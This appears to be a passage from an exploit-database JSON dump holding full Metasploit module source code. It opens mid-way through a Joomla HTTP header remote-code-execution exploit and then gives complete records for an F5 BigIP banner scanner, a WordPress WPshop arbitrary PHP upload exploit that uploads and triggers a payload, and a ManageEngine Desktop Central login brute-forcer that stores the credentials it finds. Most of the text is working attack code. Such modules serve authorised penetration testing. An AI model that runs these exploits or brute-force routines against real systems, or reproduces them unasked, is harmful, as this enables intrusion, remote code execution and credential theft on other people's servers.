\"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}\"\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def exploit\n if check == Exploit::CheckCode::Safe && !datastore['FORCE']\n print_error('Target seems safe, so we will not continue.')\n return\n end\n\n print_status(\"Sending payload ...\")\n header_name = Rex::Text.rand_text_alpha_upper(5)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\n })\n fail_with(Failure::Unknown, 'No response') if res.nil?\n session_cookie = res.get_cookies\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'cookie' => session_cookie,\n 'headers' => {\n header_name => Rex::Text.encode_base64(payload.encoded)\n }\n })\n 
end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/joomla_http_header_rce.rb"}, {"lastseen": "2019-11-27T19:18:46", "bulletinFamily": "exploit", "description": "This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses different HTTP profiles for managing HTTP traffic and these profiles allow to customize the string used as Server HTTP header. The default values are \"BigIP\" or \"BIG-IP\" depending on the BigIP system version.\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-08T20:08:59", "id": "MSF:AUXILIARY/SCANNER/HTTP/F5_BIGIP_VIRTUAL_SERVER", "href": "", "type": "metasploit", "title": "F5 BigIP HTTP Virtual Server Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'F5 BigIP HTTP Virtual Server Scanner',\n 'Description' => %q{\n This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses\n different HTTP profiles for managing HTTP traffic and these profiles allow to customize\n the string used as Server HTTP header. The default values are \"BigIP\" or \"BIG-IP\" depending\n on the BigIP system version.\n },\n 'Author' =>\n [\n 'Denis Kolegov <dnkolegov[at]gmail.com>',\n 'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',\n 'Nikita Oleksov <neoleksov[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://www.owasp.org/index.php/SCG_D_BIGIP'],\n ]\n ))\n\n register_options(\n [\n OptString.new('PORTS', [true, 'Ports to scan (e.g. 80-81,443,8080-8090)', '80,443']),\n OptInt.new('TIMEOUT', [true, 'The socket connect/read timeout in seconds', 1]),\n ])\n\n deregister_options('RPORT')\n end\n\n def bigip_http?(ip, port, ssl)\n begin\n res = send_request_raw(\n {\n 'method' => 'GET',\n 'uri' => '/',\n 'rport' => port,\n 'SSL' => ssl,\n },\n datastore['TIMEOUT'])\n return false unless res\n server = res.headers['Server']\n return true if server =~ /BIG\\-IP/ || server =~ /BigIP/\n rescue ::Rex::ConnectionRefused\n vprint_error(\"#{ip}:#{port} - Connection refused\")\n rescue ::Rex::ConnectionError\n vprint_error(\"#{ip}:#{port} - Connection error\")\n rescue ::OpenSSL::SSL::SSLError\n vprint_error(\"#{ip}:#{port} - SSL/TLS connection error\")\n end\n\n false\n end\n\n def run_host(ip)\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n\n if ports.empty?\n print_error('PORTS options is invalid')\n return\n end\n\n ports.each do |port|\n\n unless port == 443 # Skip http check for 443\n if bigip_http?(ip, port, false)\n print_good(\"#{ip}:#{port} - BigIP HTTP virtual server found\")\n next\n end\n end\n\n unless port == 80 # Skip https check for 80\n if bigip_http?(ip, port, true)\n print_good(\"#{ip}:#{port} - BigIP HTTPS virtual server found\")\n end\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb"}, {"lastseen": "2019-12-05T11:24:33", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote code execution. This module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.\n", "modified": "2017-07-24T13:26:21", "published": "2015-04-24T09:21:49", "id": "MSF:EXPLOIT/UNIX/WEBAPP/WP_WPSHOP_ECOMMERCE_FILE_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress WPshop eCommerce Arbitrary File Upload Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',\n 'Description' => %q{\n This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin\n from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote\n code execution. This module has been tested successfully on WordPress WPshop eCommerce\n 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.\n },\n 'Author' =>\n [\n 'g0blin', # Vulnerability Discovery, initial msf module\n 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['WPVDB', '7830'],\n ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],\n 'DisclosureDate' => 'Mar 09 2015',\n 'DefaultTarget' => 0)\n )\n end\n\n def check\n check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')\n end\n\n def exploit\n php_page_name = rand_text_alpha(5 + rand(5)) + '.php'\n\n data = Rex::MIME::Message.new\n data.add_part('ajaxUpload', nil, nil, 'form-data; name=\"elementCode\"')\n data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"wpshop_file\\\"; filename=\\\"#{php_page_name}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi(\n 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n if res\n if res.code == 200 && res.body =~ /#{php_page_name}/\n print_good(\"Payload uploaded as #{php_page_name}\")\n register_files_for_cleanup(php_page_name)\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unable to deploy payload, server returned #{res.code}\")\n end\n else\n fail_with(Failure::Unknown, \"#{peer} - Server did not answer\")\n end\n\n print_status(\"Calling payload...\")\n send_request_cgi(\n { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },\n 5\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb"}, 
{"lastseen": "2019-12-02T00:29:51", "bulletinFamily": "exploit", "description": "This module will attempt to authenticate to a ManageEngine Desktop Central.\n", "modified": "2019-06-27T22:06:32", "published": "2015-04-08T07:05:56", "id": "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DESKTOP_CENTRAL_LOGIN", "href": "", "type": "metasploit", "title": "ManageEngine Desktop Central Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/manageengine_desktop_central'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Login Utility',\n 'Description' => %q{\n This module will attempt to authenticate to a ManageEngine Desktop Central.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'RPORT' => 8020}\n ))\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n\n # Initializes CredentialCollection and ManageEngineDesktopCentral\n def init(ip)\n @cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n @scanner = Metasploit::Framework::LoginScanner::ManageEngineDesktopCentral.new(\n configure_http_login_scanner(\n host: ip,\n port: datastore['RPORT'],\n cred_details: @cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n end\n\n\n # Reports a good login credential\n def do_report(ip, port, result)\n service_data = {\n address: ip,\n port: port,\n service_name: 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n module_fullname: self.fullname,\n origin_type: :service,\n private_data: result.credential.private,\n private_type: :password,\n username: result.credential.public,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n last_attempted_at: DateTime.now,\n status: result.status,\n proof: result.proof\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n # Attempts to login\n def bruteforce(ip)\n @scanner.scan! do |result|\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(:level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\")\n do_report(ip, rport, result)\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(:level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\")\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n end\n end\n end\n\n\n # Start here\n def run_host(ip)\n init(ip)\n unless @scanner.check_setup\n print_brute(:level => :error, :ip => ip, :msg => 'Target is not ManageEngine Desktop Central')\n return\n end\n\n bruteforce(ip)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb"}]}